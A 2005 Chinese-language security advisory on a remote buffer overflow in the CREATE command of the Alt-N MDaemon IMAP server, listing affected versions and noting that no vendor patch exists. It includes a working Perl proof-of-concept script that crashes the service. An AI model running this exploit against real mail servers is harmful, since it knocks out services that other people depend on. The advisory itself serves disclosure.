Alt-N MDaemon IMAP Server CREATE命令远程溢出漏洞
发布日期:2005-07-20
更新日期:2005-07-20
受影响系统:Alt-N MDaemon 8.0.3
Alt-N MDaemon 8.0.2
Alt-N MDaemon 8.0.1
Alt-N MDaemon 8.0
描述:
BUGTRAQ ID:
14315
Alt-N MDaemon是一款基于Windows的邮件服务程序。
Alt-N MDaemon IMAP Server在处理超长畸形的命令参数时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在主机上执行任意指令。
攻击者可以在认证后通过CREATE命令提交过多的数据来触发这个漏洞。成功利用这个漏洞允许在服务程序的环境中执行任意代码。
<*来源:kcope (
kingcope@gmx.net)
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
### MDAEMON stack based buffer overflow
### Remote DoS exploit by kcope
use IO::Socket::INET;
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '143',
Proto => 'tcp');
$a = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\\" x 10;
print $sock "a001 LOGIN username password\r\n";
print $sock "a001 CREATE $a\r\n";
while (<$sock>) {
print $_;
}
建议:
厂商补丁:
Alt-N
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.altn.com浏览次数:3050
严重程度:0(网友投票)